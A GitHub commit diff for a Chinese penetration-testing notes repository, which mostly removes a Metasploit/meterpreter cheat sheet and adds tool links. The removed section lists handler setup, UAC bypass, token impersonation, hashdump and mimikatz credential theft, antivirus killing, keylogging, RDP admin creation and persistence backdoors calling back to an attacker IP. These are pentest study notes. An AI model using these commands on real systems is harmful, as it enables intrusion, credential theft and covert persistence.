Skip to content

Commit

Permalink
power-pentest.md 加个漏扫工具,修改metasploit部分内容,移步到metasploit小记
Browse files Browse the repository at this point in the history
Former-commit-id: 88f54615a777a81e53f624da9fb2fb26e9b52c11
  • Loading branch information
No-Github committed Jul 9, 2019
1 parent 4271364 commit c2dd33a
Show file tree
Hide file tree
Showing 6 changed files with 246 additions and 291 deletions.
1 change: 1 addition & 0 deletions 1earn/Misc/Plan/VM-Plan.md
Original file line number Diff line number Diff line change
Expand Up @@ -67,6 +67,7 @@ curl
git
SSH
lrzsz
proxychains

Centos
"Development Tools"
Expand Down
299 changes: 21 additions & 278 deletions 1earn/渗透/Power-PenTest.md
Original file line number Diff line number Diff line change
Expand Up @@ -96,6 +96,9 @@ cat wordlist.txt | python3 csbruter.py xxx.xxx.xxx.xxx

## metasploit

**用法总结**
- metasploit小记 [md](./工具/metasploit小记.md)

**文章/相关**
- [MSF基础命令新手指南](https://www.jianshu.com/p/77ffbfc3a06c)
- [【渗透神器系列】Metasploit](https://thief.one/2017/08/01/1/)
Expand All @@ -114,216 +117,6 @@ db_rebuild_cache
**图形化UI**
- [WayzDev/Kage](https://github.com/WayzDev/Kage)

### meterpreter

**文章**
- [linux - Metasploit: Module database cache not built yet, using slow search - Server Fault](https://serverfault.com/questions/761672/metasploit-module-database-cache-not-built-yet-using-slow-search)
- [Metasploit入门用法(主动攻击) - CSDN博客](https://blog.csdn.net/wsh19930305/article/details/72855660)
- [meterpreter必知必会的15个命令](https://www.4hou.com/tools/14185.html)
- [萌新科普 手把手教你如何用MSF进行后渗透测试](https://www.anquanke.com/post/id/164525)

**快速上手**
```bash
shell # 获取目标主机的 cmd shell
getsystem # 命令可以提权到本地系统权限
sysinfo # 显示系统名,操作系统,架构和语言等。
```

- 获取会话

**handler**
```bash
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set LHOST
set LPORT
exploit -j # 后台执行
```

**cmdshell 升级为 meterpreter**

如果最开始获取的是 cmdshell,后来发现这台机器非常适合作为测试其它终端的跳板,这个时候 cmdshell 的功能已经不能满足需要,升级成 meterpreter 就十分有必要。`sessions -u "id"` 将该 cmdshell 升级成 meterpreter

- 提权

**绕过 UAC**

通常 webshell 的权限都比较低,能够执行的操作有限,没法查看重要文件、修改系统信息、抓取管理员密码和 hash、安装特殊程序等,所以我们需要获取系统更高的权限

```bash
use exploit/windows/local/bypassuac # 一系列都可用
use exploit/windows/local/bypassuac_eventvwr
sessions # 查看目前的session
sessions -k # 杀死所有session
set session # 设为你需要exploit的session
```

**利用系统漏洞提权**

```bash
use exploit/windows/local/ms13_081_track_popup_menu # 以ms13-081为例
set session
```

- 进程迁移

当meterpreter单独作为一个进程运行时容易被发现,如果将它和系统经常运行的进程进行绑定,就能够实现持久化。
```bash
getpid # 查看当前会话的进程id
ps # 查看目标运行的进程
migrate pid # 绑定进程
```

- 令牌假冒

在用户登录 windows 操作系统时,系统都会给用户分配一个令牌(Token),当用户访问系统资源时都会使用这个令牌进行身份验证,功能类似于网站的 session 或者 cookie。

msf提供了一个功能模块可以让我们假冒别人的令牌,实现身份切换,如果目标环境是域环境,刚好域管理员登录过我们已经有权限的终端,那么就可以假冒成域管理员的角色。
```bash
getuid # 查看当前用户
use incognito # 进入该模块
list_tokens -u # 查看存在的令牌
impersonate_token 用户名 # 令牌假冒
# 注意用户名的斜杠需要写两个。
getuid # 查看是否切换成功
```

- 获取凭证
```bash
run hashdump
load mimikatz # 加载mimikatz模块
wdigest
kerberos
```

- 操作文件系统

**基本操作**
```bash
ls:列出当前路径下的所有文件和文件夹。
pwd 或 getwd:查看当前路径
search:搜索文件,使用search -h查看帮助。
cat:查看文件内容,比如cat test.txt。
edit:编辑或者创建文件。和Linux系统的vm命令类似,同样适用于目标系统是windows的情况。
rm:删除文件。
cd:切换路径。
mkdir:创建文件夹。
rmdir:删除文件夹。
getlwd 或 lpwd:查看自己系统的当前路径。
lcd:切换自己当前系统的目录。
lls:显示自己当前系统的所有文件和文件夹。
```

**上传和下载**
```bash
upload <file> <destination> # 上传文件到 Windows 主机
# 注意:使用 -r 参数可以递归上传上传目录和文件
download <file> <path to save> # 从 windows 主机下载文件
# 注意:Windows 路径要使用双斜线
# 如果我们需要递归下载整个目录包括子目录和文件,我们可以使用 download -r命令
```

- 其它操作

**关闭防病毒软件**
```bash
run killav
run post/windows/manage/killav
```

**操作远程桌面**
```bash
run post/windows/manage/enable_rdp # 开启远程桌面
run post/windows/manage/enable_rdp username=test password=test # 添加远程桌面的用户(同时也会将该用户添加到管理员组)
```

**截屏**

`screenshot`

**键盘记录**
```bash
keyscan_start:开启键盘记录功能
keyscan_dump:显示捕捉到的键盘记录信息
keyscan_stop:停止键盘记录功能
```

**执行程序**
```bash
execute -f <path> [options] 在目标主机上执行 exe 文件
-H:创建一个隐藏进程
-a:传递给命令的参数
-i:跟进程进行交互
-m:从内存中执行
-t:使用当前伪造的线程令牌运行进程
-s:在给定会话中执行进程
```

- 端口转发和内网代理

**portfwd**

portfwd 是 meterpreter 提供的端口转发功能,在 meterpreter 下使用 portfwd -h 命令查看该命令的参数。
```bash
portfwd add -l 2222 -r 1.1.1.1 -p 3389 # 将1.1.1.3的3389端口转发到本地的2222端口。
-l:本地监听端口
-r:内网目标的ip
-p:内网目标的端口
```

**pivot**

pivot 是 msf 最常用的代理,可以让我们使用 msf 提供的扫描模块对内网进行探测。
```bash
route add 内网ip 子网掩码 session的id # 添加一个路由
route print
如果其它程序需要访问这个内网环境,就可以建立socks代理
msf提供了3个模块用来做socks代理。
auxiliary/server/socks4a
auxiliary/server/socks5
auxiliary/server/socks_unc
use auxiliary/server/socks4a
SRVHOST:监听的ip地址,默认为0.0.0.0,一般不需要更改。
SRVPORT:监听的端口,默认为1080。
直接运行run命令,就可以成功创建一个socks4代理隧道,在linux上可以配置proxychains使用,在windows可以配置Proxifier进行使用。
```

- 后门

Meterpreter的shell运行在内存中,目标重启就会失效,如果管理员给系统打上补丁,那么就没办法再次使用exploit获取权限,所以需要持久的后门对目标进行控制

**metsvc**
```bash
run metsvc
# 命令运行成功后会在 C:WindowsTEMP 目录下新建随机名称的文件夹,里面生成3个文件(metsvc.dll、metsvc-server.exe、metsvc.exe)
# 同时会新建一个服务,显示名称为Meterpreter,服务名称为metsvc,启动类型为"自动",绑定在31337端口。
use exploit/multi/handler
set payload windows/metsvc_bind_tcp
set rhost xxx.xxx.xxx.xxx
set lport 31337
```

**persistence**
```bash
run persistence -X -i 10 -r 192.168.1.9 -p 4444
-A:安装后门后,自动启动exploit/multi/handler模块连接后门
-L:自启动脚本的路径,默认为%TEMP%
-P:需要使用的payload,默认为windows/meterpreter/reverse_tcp
-S:作为一个服务在系统启动时运行(需要SYSTEM权限)
-T:要使用的备用可执行模板
-U:用户登陆时运行
-X:系统启动时运行
-i:后门每隔多少秒尝试连接服务端
-p:服务端监听的端口
-r:服务端ip
```

---

## 抓包改包
Expand Down Expand Up @@ -451,68 +244,6 @@ ip.addr == 1.1.1.1 # IP为1.1.1.1的流量
- **URL欺骗**
- [Phishing with Unicode Domains](https://www.xudongz.com/blog/2017/idn-phishing/)

**定位**
- **案例**
```
http://www.freebuf.com/articles/database/185954.html
https://bbs.ichunqiu.com/thread-23489-1-26.html
http://www.freebuf.com/articles/web/137952.html
https://mp.weixin.qq.com/s/K-zFVBaSw6yThuoLdUTjdg
https://www.washingtonpost.com/business/technology/for-sale-systems-that-can-secretly-track-where-cellphone-users-go-around-the-globe/2014/08/24/f0700e8a-f003-11e3-bf76-447a5df6411f_story.html
```
- **GPS定位**
```
http://mygeoposition.com/
https://ip.rtbasia.com/
http://api.map.baidu.com/lbsapi/getpoint/index.html
http://www.gpsspg.com/maps.htm
http://www.opengps.cn/
http://www.gzhatu.com/jingweidu.html
http://www.gzhatu.com/dingwei.html
http://www.gzhatu.com/du2dfm.html
http://map.yanue.net/
```
- **基站定位**
```
http://www.gpsspg.com/bs.htm
http://www.cellid.cn/
http://www.haoservice.com/freeLocation/
http://www.minigps.net/cellsearch.html
```
- **手机号码归属地**
```
http://www.ip138.com:8080/search.asp
http://shouji.ip38.com/
http://www.gpsspg.com/phone/
```
- **ip查询**
```
https://asnip.net/
http://plotip.com/ip
https://db-ip.com/
https://www.ipip.net/
http://www.ip138.com/
http://www.123cha.com/
http://www.hao7188.com/
http://www.myip.cn/
https://www.ripe.net/
http://ipwhois.cnnic.net.cn/
http://ipblock.chacuo.net/
http://www.ipplus360.com/
https://www.opengps.cn/Data/IP/LocHighAcc.aspx
http://www.gpsspg.com/ip/
http://ip38.com/
https://haoip.cn/
http://www.wxip.me/
http://ip.lockview.cn/Default.aspx
http://ip.womenzhidao.com/
https://github.com/DeerCloud/IPList
```
---

## 各种爆破
Expand Down Expand Up @@ -863,6 +594,9 @@ chmod +x Vegile
### 漏洞
#### web漏扫
**漏扫靶机**
- http://testphp.vulnweb.com/
**[AWVS-acunetix](https://www.acunetix.com/vulnerability-scanner/)**
- 文章
- [编写AWVS脚本探测web services](http://gv7.me/articles/2017/Writing-AWVS-scripts-to-detect-Web-Services/)
Expand All @@ -872,6 +606,8 @@ chmod +x Vegile
**[chaitin/xray](https://github.com/chaitin/xray) - 长亭的洞鉴漏扫**
**[al0ne/Vxscan: python3写的综合扫描工具,主要用来敏感文件探测](https://github.com/al0ne/Vxscan)**
#### 综合漏扫
**[Nessus](https://www.tenable.com/downloads/nessus)**
Expand Down Expand Up @@ -2710,6 +2446,14 @@ order by测试时直接把空格换成`/**//**/`
---
### Mac
**zoom**
- POC | Payload | exp
- [JLLeitschuh/zoom_vulnerability_poc](https://github.com/JLLeitschuh/zoom_vulnerability_poc)
---
## 对外业务/软件类vul
### 分布式
Expand Down Expand Up @@ -2977,8 +2721,7 @@ order by测试时直接把空格换成`/**//**/`
**Java RMI**
- **JAVA RMI 反序列化远程命令执行漏洞**
- 文章
- []()
**OpenSSH**
- **CVE-2018-15473 OpenSSH 用户枚举漏洞**
Expand Down Expand Up @@ -3009,10 +2752,10 @@ order by测试时直接把空格换成`/**//**/`
### mobile
`逻辑漏洞基本与web姿势相同`
- 任意号码注册
- 任意文件下载
- 任意文件上传
- 短信重置密码接口(短信轰炸)
`其他我不会 ^w^`
![image](../../img/渗透/mobile.gif)
---
Expand Down
2 changes: 2 additions & 0 deletions 1earn/渗透/实验/DVWA小记.md
Original file line number Diff line number Diff line change
Expand Up @@ -317,6 +317,8 @@ for key in open("password.txt"):
```
![image](../../../img/渗透/实验/dvwa/dvwa11.png)

代码写的烂,不要笑话其实用这个匹配是最关键的 `user_token = re.findall(r"name='user_token' value='(.+?)'",content)[0]`

注: 使用 urllib3 的 ProxyManager 可以让 python 产生的 http 请求流量通过 burpsutie 的 proxy

```python
Expand Down
Loading

0 comments on commit c2dd33a

Please sign in to comment.